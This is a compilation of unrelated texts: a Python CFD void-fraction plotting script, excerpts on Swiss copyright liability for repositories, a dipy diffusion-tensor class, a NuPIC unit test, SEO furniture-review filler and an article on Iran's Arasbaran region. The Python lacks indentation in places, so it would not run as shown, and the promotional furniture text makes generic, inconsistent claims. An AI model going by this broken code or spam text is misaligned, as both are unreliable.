# Output format : velocity : r z ux uy uz ur ut uz
# scalar : r z scalar
#
# Usage : python UProbefile
#
# Author : Bruno Blais
#
#-------------------------------------------------------------------------------------------------------------
# Python imports
#----------------
import os
import sys
import numpy
import math
import matplotlib.pyplot as plt
from matplotlib import ticker #Manually change number of tick
import matplotlib.patches as patches
#----------------
#================================
# USER DEFINED VARIABLES
#================================
pdf=False
tol=1e-4
paperMode=True
impeller=True
impellerType="pbtTs4"
contour=False
nContour=100
colorList=["c","m","g","r","b", "k","c","m","g","r","b","k"]
aval=0.5
#Functions for the averaging
from functionAverage import *
#===============================
# FIGURE OPTIONS
#===============================
#Figure size
plt.rcParams['figure.figsize'] = 17, 8
params = {'backend': 'ps',
'axes.labelsize': 26,
'axes.titlesize': 26,
'text.fontsize': 20,
'legend.fontsize': 20,
'xtick.labelsize': 22,
'ytick.labelsize': 22,
'text.usetex': True,
}
plt.rcParams.update(params)
#================================
# MAIN
#================================
if len(sys.argv) < 2:
    print "Insufficient number of arguments, need a folder argument"
    sys.exit(1)
folder = sys.argv[1:]
# Acquire list of time step
speedFolder=folder
# Sort so that speed will already be sorted
speedFolder.sort()
fig = plt.figure(figsize=(6,8))
ax = fig.add_subplot(111)
for j,i in enumerate(speedFolder):
subFolder=i +"/CFD/resultsCFD/postProcessing/probes"
time=os.listdir(subFolder)
fname = subFolder+"/"+max(time)+"/"+"voidfraction"
print "Postprocessing file : ", fname
rl,zl,acc,dev=scalarAverage(fname,impeller,impellerType)
extent=(numpy.min(rl),numpy.max(rl),numpy.min(zl),numpy.max(zl))
if (j==0):
accAll=acc
levels = (0.,1.) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(accAll, levels, hold='on',alpha=1, colors="w",origin='lower', extent=extent)
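    # keep the pointwise maximum of the void fraction across all speeds processed so far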
else: accAll=numpy.maximum(acc,accAll)
#plt.subplots_adjust(left=0.02, bottom=0.09, right=0.95, top=0.94, wspace=0.15)
#plt.subplot(1,1,1)
#plt.xlabel("r [m]")
#plt.ylabel("z [m]")
#plt.imshow(acc[:,:],extent=extent,origin='lower',interpolation="bicubic",vmin=0.4,vmax=1.)
#if (len(sys.argv)>3):
# plt.title("%s" %(sys.argv[3]))
#else:
# plt.title("%s" %(sys.argv[1]))
#cbar = plt.colorbar( drawedges=False)
#tick_locator = ticker.MaxNLocator(nbins=7)
#cbar.locator = tick_locator
#cbar.update_ticks()
#cbar.ax.tick_params(labelsize=20)
#cbar.solids.set_edgecolor("face")
maxdiff=numpy.nanmax(acc)
mindiff=numpy.nanmin(acc)
levels = (0,0.5) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(acc, levels, hold='on',alpha=0.5, colors=colorList[j],origin='lower', extent=extent)
CS=plt.contour(acc, levels, hold='on',alpha=1, colors="k", origin='lower', extent=extent)
#plt.clabel(CS, inline=1, fontsize=14,colors="white")
levels = (0.,1.) # numpy.arange(mindiff, maxdiff+tol, (maxdiff-mindiff)/nContour)
CS=plt.contourf(accAll, levels, hold='on',alpha=0.10, colors="y",origin='lower', extent=extent)
# get data you will need to create a "background patch" to your plot
xmin = numpy.min(rl)
xmax = numpy.max(rl)
ymin = numpy.min(zl)
ymax = numpy.max(zl)
xy = (xmin,ymin)
width = xmax - xmin
height = ymax - ymin
# create the patch and place it in the back of countourf (zorder!)
p = patches.Rectangle(xy, width, height, fill=True,color="k",alpha=0.4, zorder=-10)
ax.add_patch(p)
#Get artists and labels for legend and chose which ones to display
handles, labels = ax.get_legend_handles_labels()
display = (0,1,2)
#Create custom artists
a1 = patches.Rectangle((0,0),1,1,color=colorList[0],alpha=aval)
a2 = patches.Rectangle((0,0),1,1,color=colorList[1],alpha=aval)
a3 = patches.Rectangle((0,0),1,1,color=colorList[2],alpha=aval)
a4 = patches.Rectangle((0,0),1,1,color=colorList[3],alpha=aval)
#anyArtist = plt.Line2D((0,1),(0,0), color='k')
ax.legend([handle for i,handle in enumerate(handles) if i in display]+[a1,a2,a3,a4],
[label for i,label in enumerate(labels) if i in display]+["100RPM","200RPM","300RPM","400RPM"])
if (pdf): plt.savefig("./levelAnalysis.pdf")
plt.show()
|
An institutional repository's tasks usually comprise depositing, administering and making accessible to the public documents produced by the institution's scholars or researchers. When a document is submitted to an institutional repository it is not made available online immediately. Rather it must first undergo quality control procedures. The scope of these procedures varies from repository to repository. They can include checking the metadata, key-word indexing and cataloguing, and the evaluation of the content. For more information on quality assurance in electronic archives in general, see Andermann and Degwitz (2004, p. 53 ff.).
The following passages about legal consequences and recourse to the author are from: Hilty, Reto M. and Seemann, M. (2009) Open Access - Access to scientific publications in Swiss law (Expert opinion commissioned by the University of Zurich).
If a repository operator makes scientific works available without holding the necessary copyright, he commits a breach of copyright. In such a case, the copyright holder has at his disposal the legal remedies pursuant to Arts. 61 et seq. of the URG (Swiss Copyright Law). In particular, an action can be brought against the operator for the elimination of the infringement (Art. 62 Para. 1 b, URG). Thus the operator can, for instance, be obliged to remove the work in question from the repository.
Financial consequences are also possible on the basis of actions deriving from the OR (Swiss Code of Obligations), as reserved by Art. 62 Para. 2 of the URG. The obvious measure here is an action for damages with which for instance the publisher can claim the refund of the profit lost through the breach of copyright from the repository operator (Art. 62 Para. 2, URG in conjunction with Arts. 41 et seq., OR). However, the publisher must prove the difference, which is probably difficult in practice because it is hardly possible to establish causality between the activities of the repository operator and the losses incurred by the publisher.
An action can be filed by anyone who holds the infringed copyright subpowers (Art. 62 Para. 1, URG) or who holds an exclusive licence to these powers (Art. 62 Para. 3, URG). The publication of a work in a repository involves the online rights, that are as a matter of principle held by the author or the publisher. Hence it is mostly the author or the publisher that is entitled to file the action.
The defendant can be both the operator of the repository but also any other persons who have participated in the copyright infringement. In other words, it is not only the main infringer but also an instigator or an accessory who can be sued (cf. Art. 50 Para. 1, OR). If the online rights to a work are held for instance by a publisher, and if the author has nevertheless published his work in a repository, an action can be brought both against the operator of the repository and against the author. In the case of a claim for damages, the operator and the author are jointly and severally liable (Art. 50 Para. 1, OR). The plaintiff can choose the defendant against whom he wishes to proceed and whether to claim a whole or a part of the losses from this person (Art. 144 Para. 1, OR).
The repository operator can by contract transfer to the author the risk of being sued for damages by third parties for infringement of rights. This is done by means of a contractual clause in which the author undertakes to indemnify the repository operator in the event of third-party claims, i.e. to assume the costs incurred and any damages payable.
From a practical point of view, it should be noted that such a transfer of the risk to the author can reduce the attractiveness of the repository and that there might be fewer authors willing to make their work publicly accessible in the repository. The publishing contract between the author and the publisher does not always make it immediately clear whether the author is authorised to deposit the work in a repository in parallel with publication. For this reason, the manner in which liability for infringements of rights is distributed is a central aspect of the agreement between the author and the repository operator.
If the repository operator and the author have not included a provision in the agreement dealing with liability for rights infringements, the repository operator can only have recourse to the author to the extent that the latter is jointly responsible for the copyright infringement (and to this extent can also be sued directly). Such a joint responsibility applies as a matter of principle if the deposit is made by the author himself or with his consent. The shares to be assumed by the repository operator and the author are determined by judicial discretion in the specific case (Art. 50 Para. 2, OR).
The repository operator is to be classified as a content provider, whose performance goes beyond the mere technical storage and making available offered by a pure access provider. However, even a content provider is only subject to liability to the extent that he has failed to take possible and reasonable measures to prevent infringements of rights. The repository operator can be expected to clarify the copyright entitlement to the individual works and to attempt to remedy any infringement of rights. However, the repository operator could not additionally be expected to acquire knowledge of the content of each individual work and to examine it for infringements.
Self-archiving in the sense of self-posting refers to the individual, non-standardised archiving and making available to the public of publications, for example on a faculty, institute or private website.
The main breaches of rights that can occur when self-posting are the infringement of intellectual property rights, for example third-party copyrights, and the violation of privacy rights. When university staff members self-archive their works on their personal websites, the question of the university's liability does not arise provided the university does not operate these websites and is not responsible for their contents.
|
import dipy.core.gradients
import dipy.reconst.dti
import dipy.segment.mask
import numpy
import nibabel
from core.generictask import GenericTask
from lib.images import Images
__author__ = 'desmat'
class TensorDipy(GenericTask):
def __init__(self, subject):
GenericTask.__init__(self, subject, 'upsampling', 'registration', 'qa')
def implement(self):
dwi = self.getUpsamplingImage('dwi', 'upsample')
bValsFile = self.getUpsamplingImage('grad', None, 'bvals')
bVecsFile = self.getUpsamplingImage('grad', None, 'bvecs')
mask = self.getRegistrationImage('mask', 'resample')
fit = self.__produceTensors(dwi, bValsFile, bVecsFile, mask)
def __produceTensors(self, source, bValsFile, bVecsFile, mask):
self.info("Starting tensors creation from dipy on {}".format(source))
dwiImage = nibabel.load(source)
maskImage = nibabel.load(mask)
maskData = maskImage.get_data()
dwiData = dwiImage.get_data()
dwiData = dipy.segment.mask.applymask(dwiData, maskData)
gradientTable = dipy.core.gradients.gradient_table(numpy.loadtxt(bValsFile), numpy.loadtxt(bVecsFile))
model = dipy.reconst.dti.TensorModel(gradientTable)
fit = model.fit(dwiData)
tensorsValues = dipy.reconst.dti.lower_triangular(fit.quadratic_form)
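        # dipy's lower_triangular() returns (Dxx, Dxy, Dyy, Dxz, Dyz, Dzz);
        # reorder to (Dxx, Dxy, Dxz, Dyy, Dyz, Dzz), the row-major lower-triangular
        # convention apparently expected downstream (assumption based on the reorder below)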
correctOrder = [0,1,3,2,4,5]
tensorsValuesReordered = tensorsValues[:,:,:,correctOrder]
tensorsImage = nibabel.Nifti1Image(tensorsValuesReordered.astype(numpy.float32), dwiImage.get_affine())
nibabel.save(tensorsImage, self.buildName(source, "tensor"))
nibabel.save(nibabel.Nifti1Image(fit.fa.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "fa"))
nibabel.save(nibabel.Nifti1Image(fit.ad.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "ad"))
nibabel.save(nibabel.Nifti1Image(fit.rd.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "rd"))
nibabel.save(nibabel.Nifti1Image(fit.md.astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "md"))
        # fit.evecs has shape (..., 3, 3); index the last axis to select the
        # per-voxel eigenvectors instead of slicing the volume along x
        nibabel.save(nibabel.Nifti1Image(fit.evecs[..., 0].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v1"))
        nibabel.save(nibabel.Nifti1Image(fit.evecs[..., 1].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v2"))
        nibabel.save(nibabel.Nifti1Image(fit.evecs[..., 2].astype(numpy.float32), dwiImage.get_affine()), self.buildName(source, "v3"))
#nibabel.save(nibabel.Nifti1Image(fit.adc(dipy.data.get_sphere('symmetric724')).astype(numpy.float32),
# dwiImage.get_affine()), self.buildName(target, "adc"))
faColor = numpy.clip(fit.fa, 0, 1)
rgb = dipy.reconst.dti.color_fa(faColor, fit.evecs)
nibabel.save(nibabel.Nifti1Image(numpy.array(255 * rgb, 'uint8'), dwiImage.get_affine()), self.buildName(source, "tensor_rgb"))
self.info("End tensor and metrics creation from dipy, resulting file is {} ".format(fit))
return fit
def isIgnore(self):
return self.get("ignore")
def meetRequirement(self):
return Images((self.getUpsamplingImage('dwi', 'upsample'), "upsampled diffusion"),
(self.getUpsamplingImage('grad', None, 'bvals'), "gradient value bvals encoding file"),
(self.getUpsamplingImage('grad', None, 'bvecs'), "gradient vector bvecs encoding file"),
(self.getRegistrationImage('mask', 'resample'), 'brain mask'))
def isDirty(self):
return Images((self.getImage("dwi", "tensor"), "dipy tensor"),
(self.getImage('dwi', 'v1'), "selected eigenvector 1"),
(self.getImage('dwi', 'v2'), "selected eigenvector 2"),
(self.getImage('dwi', 'v3'), "selected eigenvector 3"),
(self.getImage('dwi', 'fa'), "fractional anisotropy"),
(self.getImage('dwi', 'md'), "mean diffusivity MD"),
(self.getImage('dwi', 'ad'), "selected eigenvalue(s) AD"),
(self.getImage('dwi', 'rd'), "selected eigenvalue(s) RD"))
#"apparent diffusion coefficient" : self.getImage(self.workingDir, 'dwi', 'adc')}
def qaSupplier(self):
"""Create and supply images for the report generated by qa task
"""
qaImages = Images()
softwareName = 'dipy'
#Get images
mask = self.getRegistrationImage('mask', 'resample')
#Build qa images
tags = (
('fa', 'Fractional anisotropy'),
('ad', 'Axial Diffusivity'),
('md', 'Mean Diffusivity'),
('rd', 'Radial Diffusivity'),
)
for postfix, description in tags:
image = self.getImage('dwi', postfix)
if image:
qaImage = self.buildName(image, softwareName, 'png')
self.slicerPng(image, qaImage, boundaries=mask)
qaImages.extend(Images((qaImage, description)))
return qaImages
|
Great! Economy Prep Table top design by Advance Tabco. The Economy Prep Table is very well made, sleek and simple. Complete your living room furniture with a modern Economy Prep Table. It is good looking, sturdy and attractive; it looks expensive and is a great value for the money. The Economy Prep Table is one of the most homey, cozy, nice looking and exotic pieces, especially for the price, and it is made of excellent materials. Great quality, easy to assemble, delivered on time and in best condition. The Economy Prep Table is good merchandise at fair prices with wonderful free shipping. Damage claims are covered by offering to send parts or to keep the item at a discounted price. A great buy; would definitely recommend. Shop with our low-price guarantee and find great deals on the Economy Prep Table and more! Reading the reviews will help you purchase.
A very common piece of furniture at home is the bar stool. They come in handy in all kinds of locations, from the kitchen to the porch to the bar. Bar stools are not just for the bar anymore. More and more homes have them as furnishings. The great advantage of a bar stool is that its height allows you to sit right at counter height. If you have a large kitchen with an island in it, a few bar stools let you turn that island into a breakfast table or a spot to unwind and read the paper. There are many kinds of bar stools to choose from on the market, and that is where the problem begins, since you may be baffled about which one is best for you. But we have narrowed down the range of bar stools that you could buy and use. Thankfully, we have already done the research for you, and in this list we have compiled the top 10 best bar stool reviews in 2018 that you can buy for your bar. Once you review this list, you will easily be able to purchase the right bar stools for you.
This luxurious set of urban-chic couches is made to furnish an embellished space; even a modest room can host the perfect film evening. Lay it down for a fully converted bed. This avant-garde single futon is available in various tones, including some vibrant shades such as orange, light blue, and light crimson. Put it in your creative study or loft to raise the energy. It is also available in subdued shades such as brown, dark grey and black, which again lend a respectable, upscale air. With its reclining back, you can rest in your favorite position. This sofa looks rich with its tufted fabric upholstery, and it is padded with hypoallergenic filling. The end result is a comfortable rest.
Does your room have space constraints? Are you unable to throw a sleepover for lack of space? This DHP futon could be ideal for you in that situation. This futon sofa by DHP combines the functionality of a sofa bed with a contemporary, elegant appearance. Put it in your living room to gain an extra bed at night. Its popular microfiber upholstery makes a perfect match for most rooms, and the piece comes with shiny chrome legs. Together these add up to a comfortable, popular-style sofa. You can choose to get it in faux leather, velvet or linen. A feature worth mentioning is its back design: with its multiple positions, DHP lets you adjust the sofa to your comfort level. You can sit it upright for an animated chat, or recline it for a quiet movie night.
With almost 100 5-star reviews, this reclining loveseat is recommended for its comfort, durability, appearance and easy setup. In addition to soft but supportive cushions, it offers a gliding mechanism, so you can put your feet up and rock (though not simultaneously). Upholstered with ultra-durable bonded leather, this reclining loveseat will resist tears, rips and stains, which is a good thing, because it also includes a storage console (where you can hide your snacks, obviously) along with a two-cup holder. Whether you are settling in for a Netflix binge or watching football with your crew, this reclining loveseat offers durability and comfort without emptying your wallet.
The Carolina Light Grey Fabric Sectional Couch is celebrated for its stunning comfort and remarkable style. It features a modular design that allows several arrangement options to meet your needs. The set features soft fabric and plush cushions to deliver the desired comfort. More importantly, it is of a good size to accommodate you and your circle of friends. Depending on the space and your preferred shape, you can combine the seats to create a remarkable form. It is highly recommended for those with small rooms who need a couch.
The Bridgewater is a sofa design that is primarily casual and definitely comfortable. This style is the darling of many a designer simply because it can be used to create a casual, pleasant space. Bridgewater couches are flexible, depending on the upholstery you choose. Done in a neutral fabric, this kind of couch doesn't compete with other elements in the room that may be more striking, such as artwork or other large features. More formal fabric will produce a more grand style of couch. A number of characteristics distinguish Bridgewater sofas: typically they have low arms and a high back, which contributes to the casual look. Most also have a tailored skirt that hides the legs, and loose cushions for the seat and back. This particular design was created to accommodate slipcovers, which also lend an informal air to the sofa.
The watchwords here are comfort and a sophisticated look. This set includes a tufted backrest and nailhead accents that provide a subtle look. Its gray colour adds to its impressive appearance. It can fit up to an 8-inch mattress; that alone tells you how comfy the set can be. Notably, it doesn't include a mattress, so you may need to purchase one. The trundle includes castors to allow quick access, and you can pull the trundle out for people to sit on. Just to mention, it does require assembly, but it's very easy to assemble.
This ultra-elegant, high-end couch is designed to support a cutting-edge living room. It is produced as a 2-piece set: a sofa coupled with a beautiful chair. It also offers movable armrests and helpful back support. The beautiful upholstery is finished in black faux leather, firmly tufted. You can feel the comfortable foam padding inside the seat cushions; this guarantees a delicate feeling when you rest after a tiring day. The couch is reinforced with a wooden frame covered in dark faux leather. The tufted faux leather and solid pine frame give it a striking presence. It is true that it deserves a second look, since it looks more expensive than it really is. Speaking of size, it's huge! This is what earns the set extra stars. The height is also comfortable for both tall and short people.
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have purchased from
# Numenta, Inc. a separate commercial license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for model selection via cluster params."""
import unittest
from nupic.support.unittesthelpers.testcasebase import TestCaseBase
from nupic.frameworks.opf.modelfactory import ModelFactory
from nupic.frameworks.opf.clamodel import CLAModel
from nupic.frameworks.opf.common_models.cluster_params import (
getScalarMetricWithTimeOfDayAnomalyParams)
class ClusterParamsTest(TestCaseBase):
def testModelParams(self):
"""
Test that clusterParams loads returns a valid dict that can be instantiated
as a CLAModel.
"""
params = getScalarMetricWithTimeOfDayAnomalyParams([0],
minVal=23.42,
maxVal=23.420001)
    encodersDict = (
params['modelConfig']['modelParams']['sensorParams']['encoders'])
model = ModelFactory.create(modelConfig=params['modelConfig'])
self.assertIsInstance(model,
CLAModel,
"JSON returned cannot be used to create a model")
# Ensure we have a time of day field
self.assertIsNotNone(encodersDict['c0_timeOfDay'])
# Ensure resolution doesn't get too low
if encodersDict['c1']['type'] == 'RandomDistributedScalarEncoder':
self.assertGreaterEqual(encodersDict['c1']['resolution'], 0.001,
"Resolution is too low")
# Ensure tm_cpp returns correct json file
params = getScalarMetricWithTimeOfDayAnomalyParams([0], tmImplementation="tm_cpp")
self.assertEqual(params['modelConfig']['modelParams']['tpParams']['temporalImp'], "tm_cpp",
"Incorrect json for tm_cpp tmImplementation")
# Ensure incorrect tmImplementation throws exception
with self.assertRaises(ValueError):
getScalarMetricWithTimeOfDayAnomalyParams([0], tmImplementation="")
if __name__ == '__main__':
unittest.main()
|
Arasbārān (Persian: ارسباران or قرهداغ, also Romanized as Arasbārān and formerly known as Qarājadāḡ, Qaradagh, or Qaraja dagh) is a large mountainous area stretching from the Qūshā Dāgh massif, south of Ahar, to the Aras River in East Azerbaijan Province of Iran. The region is confined by the Aras River in the north, Meshgin Shahr County and Moghan in the east, Sarab County in the south, and Tabriz and Marand counties in the west. Since 1976, UNESCO has registered 72,460 hectares of the region, confined to 38°40′ to 39°08′N and 46°39′ to 47°02′E, as a biosphere reserve with the following general description: "This biosphere reserve situated in the north of Iran at the border to Armenia and Azerbaijan belongs to the Caucasus Iranian Highlands. In-between the Caspian, Caucasus and Mediterranean region, the area covers mountains up to 2,200 meters, high alpine meadows, semi-arid steppes, rangelands and forests, rivers and springs. Arasbaran is the territory of about 23,500 nomads who are mainly living in the buffer and transition zones (2000). Economic activities in the biosphere reserve are mainly agriculture, animal husbandry, horticulture, apiculture, handicrafts and tourism, but business activities can also be found in urbanized areas."
There is no mention of Arasbaran as a geo-political entity in written sources dating prior to the Safavid era. There is speculation that the region referred to as Syah Kuh by the 10th-century Muslim geographer Ibn Hawqal corresponds to the present-day Arasbaran. However, the said Syah Kuh has more similarities with Manghishlaq on the eastern shores of the Caspian Sea. Therefore, Arasbaran's history should be considered in the context of its two main towns, Ahar and Kaleybar.
Kaleybar, formerly known as Bedh, was the stronghold of Babak Khorramdin who, in 816 AD, revolted against the Islamic Caliphate and was defeated in 836 AD. The events of those two tumultuous decades have been extensively reported by Islamic historians of the epoch. The first report is by Al-Masudi in The Meadows of Gold: Babak revolted in the Bedh region with the disciples of Djavidan ... Following a series of defeats Babak was blockaded in his native town..., which even now is known as Babak's country. Ibn Athir, in his book The Complete History, has devoted many pages to the description of the battles.
Yaqut al-Hamawi, writing in the early thirteenth century, describes Kaleybar in the following words: County between Azerbaijan and Erran.... This county produces pomegranates of incomparable beauty, excellent figs and grapes that are dried on fires (because the sun is always obscured by thick clouds). In the 12th-13th centuries, Ahar was a minor and short-lived, but prosperous, emirate ruled by the Pishteginid dynasty of Georgian origin (1155–1231). Yaqut al-Hamawi describes Ahar as very flourishing despite its small extent.
Both towns lost most of their importance during the rule of the Ilkhanate. Hamdallah Mustawfi, writing in the mid fourteenth century, describes Ahar as a little town, and Kaleybar as a village of Azerbaijan, in the woods near a mountain which comprises a fortress.
Ahar was at the focus of the Safavid dynasty's agenda for casting Azerbaijan as a Safavid dominion. Thus, Shah Abbas rebuilt the mausoleum of Sheikh Shihab-al-din in Ahar.
The Arasbaran region suffered enormously during the Russo-Persian War (1804–13) and the Russo-Persian War (1826–28) due to its proximity to the war zone. Western travelers in the 1837–1843 period found Ahar, a city with around 700 households, in wretched condition.
The declaration by UNESCO of Arasbaran as a UNESCO Biosphere Reserve in 1976 was a great endorsement of the region's ecotourism potential. More recently, visitors from places as far away as Canada have expressed their amazement in approving words. The planned promotion of the biosphere reserve to National Park status may further enhance Arasbaran's environmental significance.
Arasbaran is home to 215 species of birds, notably the Caucasian black grouse, grey partridge, black francolin, and common pheasant; 29 species of reptiles; 48 species of mammals, notably wild goat, wild boar, brown bear, wolf, lynx, and leopard; and 17 species of fish. There is an ongoing effort to revitalize the locally extinct subspecies of Caspian red deer. The local flora include hornbeam, sumac, and berberis. A unique characteristic of Arasbaran forests is the ubiquity of edible wild trees. For instance, a patch of forest between Aghaweye and Oskolou includes hazelnut trees. The large walnut and Cornus mas trees, growing wild alongside water-streams, provide an important income source for inhabitants. More exotic plant species, such as redcurrant, truffle and herbs with applications in traditional medicine, significantly add to the ecological importance of the Arasbaran region.
A recent study has indicated that three sites have the highest potential for ecotourism. These sites, which are located along the road connecting Kaleybar to Asheqlu (the Abbasabad-Aynaloo-Vayqan direction), include the Mikandi valley, the Aynali forests and Babak Castle. There are, however, more unexplored touristic potentials. One example is a holy mountain located at the coordinates (38°55′16.64"N, 46°47′24.62"E). Most inhabitants of the now abandoned village, Garmanab, were Izadis, followers of the Yârsân religion. They used to slaughter sacrificial animals at the site, which is located on the slopes of a hill. Nobody bothered to ask the reasons behind the holiness of the site. However, the pleasure of an occasional feast was so tempting that followers of the Shia sect attended the holy site, too. Nowadays there are few worshipers and the centuries-long traditions are almost forgotten. The revival of these rituals may attract cultural visitors.
Another potential touristic attraction is the summer camps (ییلاق) of the semi-settled tribes of Arasbaran, known as Ilat, who spend five months of the year in the uplands grazing their livestock. A tourist, while enjoying the fresh thin air of the mountains, may get a chance to observe the age-old traditional living styles of the locals. Some of the attractive sites are the Aliabad mountains, the meadows above Shojaabad (East Azerbaijan) village, and the Chaparli and Aqdash summer quarters, all located within driving distance of Kaleybar.
Numerous hot springs, scattered all over the region, are considered attractions for promoting tourism. One example is the Motaalleq hot spring therapeutic facility, the largest of its kind in Iran. The facility, with an area of 12,870 m², includes bathing areas, a coffee shop, restaurants, a prayer room, and a gymnasium.
In recent years, the local government has organized Zoğal festivals in Kaleybar as a means of promoting tourism. In addition, every year in the second half of October a Pomegranate Festival is organized by the provincial authorities in Mardanaqom village. The main program of the festival is a performance of Ashugh music.
Nearly every village in the region has a landmark in its territory. Some of these are potential tourism attractions. For instance, there is a landmark ancient plane tree in Kavanaq village, whose photo is presented here. The tree is about 3 meters in diameter and is said to have lived for 500 years. The villagers have developed interesting oral narratives around the events experienced by the tree.
In the wake of the Russo-Persian War (1804–13) a significant fraction of the inhabitants lived as nomadic tribes (ایلات). The major tribes included Chalabianlu, 1,500 tents and houses; Karacurlu, 2,500; Haji-Alilu, 800; Begdillu, 200; and various minor groups, 500. At the time Ahar, with 3,500 inhabitants, was the only city of Qaradağ. By the beginning of the twentieth century the settlement of tribesmen was growing, and in 1920 there were more than four hundred villages, fewer than thirty of which were Armenian. However, the nomadic way of living has survived to the present. The nomadic population at present has been estimated to be about 36,000, not significantly different from the 30,000 estimate of 1960.
The defeat of the Azerbaijan People's Government and the tragic events that followed resulted in mass migration of inhabitants to Tabriz and Tehran. Most of these migrants settled in shanty towns and worked as painters. The land reforms of 1962–1964 accelerated the migration. The case of a typical village, Abbasabad, demonstrates the population depletion well: the number of families dropped from 60 in 1970 to 12 in 2006.
After the election of Ahmadinezhad as president of Iran, a rumor circulated that UNESCO would compensate the residents to have the village evacuated for wild-life protection efforts. Some early emigrants returned and built decent houses. At present the region is undergoing a population boom as more wealthy city residents want to spend their retirement in a cleaner environment. Recently, the deputy governor of East Azarbaijan province mentioned the phenomenon of reverse migration to Khoda Afarin and Kaleybar counties. The problem is that the population is aging and working-age adults, in the face of scarce job opportunities, live most of the year in large population centers such as Tehran. The issue is so critical that during a recent presidential campaign Mohsen Rezaee referred to Iranian villages as "the old age residence".
The spoken language is Azerbaijani, which belongs to the western group of the southwestern, or Oghuz, branch of the Turkic language family. It has a high degree of mutual intelligibility with Anatolian Turkish. Most inhabitants are also familiar with Persian, which is the official language of Iran and the sole language of education. Until 1980, the elders of four villages (Chay Kandi, Kalasor, Khoynarood, and Arazin) communicated in Tati, the Iranian language spoken in Azerbaijan before the arrival of Turkish speakers in the time of Mahmud of Ghazni (around 1000 AD).
The majority of people are followers of Shia Islam. The last Armenian resident passed away in 1978. The region is also home to a large number of followers of the Yârsân religion (Shamloo).
The Pahlavi era was a dark period for the cultural identity of Arasbaran. Rezā Shāh, insisting on ethnic nationalism and cultural unitarism, implemented policies of forced detribalization and sedentarization. He renamed Qaradağ as Arasbaran to deny the Turkic identity of the inhabitants. Moreover, education and publication in the Azerbaijani language were banned, and writers of Azerbaijan had to write in Farsi, a medium which was, perhaps, not adequate for recording the subtleties of Qaradağ's native culture, which had evolved under the influence of the Turkish language. This language has a rare and unusual point of grammar called the hearsay tense. Consequently, in Turkish-speaking society the boundary between private and shared memories becomes fuzzy, and the magnitude of the time lapse between events shrinks. This is an ideal feature for the generation of oral cultural artifacts, particularly mythology, epics and folkloric music.
A rare opportunity for recording and preserving Qaradağ's culture was provided by the innovative method that Shahriar adopted in his famous verse book, Heydar Babaya Salam, to summarize the cultural identity in concise poetic form. A generation of lesser-known poets from Arasbaran used a similar approach to perpetuate the region's oral traditions. Remarkable examples are Mourning Sabalan by Abbas Barez and "Hail to Qizil Qala'h" by Seifollah Delkhon. Another example is Mohamad Golmohamadi's long poem, titled I am madly in love with Qareh Dagh (قاراداغ اؤلکهسینین گؤر نئجه دیوانهسی ام), which is a concise description of the region's cultural landscape.
The inhabitants of every village attribute spiritual importance to multiple sites scattered throughout the village territory. These places, generally known as Ojaq, are located in areas with rapid variation in the land topography, and are in some way linked to Djins via established narratives. Most of these sites do not possess any significantly conspicuous landmark. At some sites, which are considered sacred by many villages, people occasionally gather to slaughter sacrificial animals or offer a simple meal of freshly baked bread and cheese with tea. At some sites, they have collected medium-sized rocks around trees and hang colored threads or ribbons from the branches.
In most villages there are more sites with narrative associations which are not considered sacred. These sites are in secluded locations formed by the natural topography of the landscape. Often the narratives involve bears as the principal subject. The main theme of the narratives is the following: a male bear kidnaps a blackberry-picking pretty girl and takes her to his den. A hybrid child is born, but the girl runs away at the first opportunity, leaving the lamenting bear entreatingly crying for his lost wife.
According to one myth, the wolf is a symbol of merciless power that is able to destroy everything. If a human being touches it, whatever frightens him or her will be frustrated.
Vergi, meaning gift, is a perceived ability to perform extraordinary feats such as foretelling or healing, which can only be received from God or from the Shia Imams. It is believed that a Vergi is inherited and cannot be learned. For instance, there is a family in Vayqan among whom the Vergi for catching snakes is transmitted from generation to generation. Sometimes the Vergi is claimed to be received in dreams. But often it is received in Ojaqs, where ghosts show themselves and talk to the gifted. It is believed that there is no escape from Vergi and that, at first, it generates suffering comparable to shamanistic illness.
Toğs; relics of Ashura day?
Ashura, the 10th day of the lunar month of Muharram, is the day on which the mourning celebrations commemorating Imam Husayn's martyrdom reach their climax. In many villages of Qaradağ, palm-sized metallic icons fixed on medium-sized wooden handles, locally known as Toğs, are harbingers of the exact hour when Husayn was killed; allegedly, they relapse into utter inanimation following ten days of relentless erratic movements at the hands of their carriers (alamdars). The Toğs – believed to be sisters – are housed in the mosques and are greatly revered by the inhabitants of all neighboring villages. Unfortunately, there are no systematic studies or first-hand reports on these fascinating relics. Still, every year, as a ritualistic obligation, expatriates flock to the said villages to receive the blessings of the sacred day in the company of their sacred Toğs. In the accompanying photo two persons holding Toğs can be seen, surrounded by mourners beating on their legs. One Toğ is kept standing still in the center. It seems that the other Toğ is performing erratic motions and is pulling its holder.
Orhan Pamuk, in his 2001 novel My Name Is Red, gives a vivid description of Turkic people's love-hate attitude towards dogs. Every summer, the real-life version of this description is on display in Chaparli. Each family has 2-5 dogs, all with characteristic cropped ears and tails. The dogs are fed generous portions of milk-soaked bread. When the sheep herds are brought back for milking near the tents, the dogs sleep around the camp most of the day. The inhabitants treat the beasts with utter respect, a manner which is loathed by the more pious villagers of the region as a pagan act. Between dusk and dawn the dogs regain their vicious character; strangers have to avoid crossing the campsite, otherwise the attacking dogs cannot be controlled even by their owners. Fending off the dogs by beating is considered an act of aggression towards the owner and should be avoided. In fact, most of the feuds between settled villagers and pastoralists are about dogs.
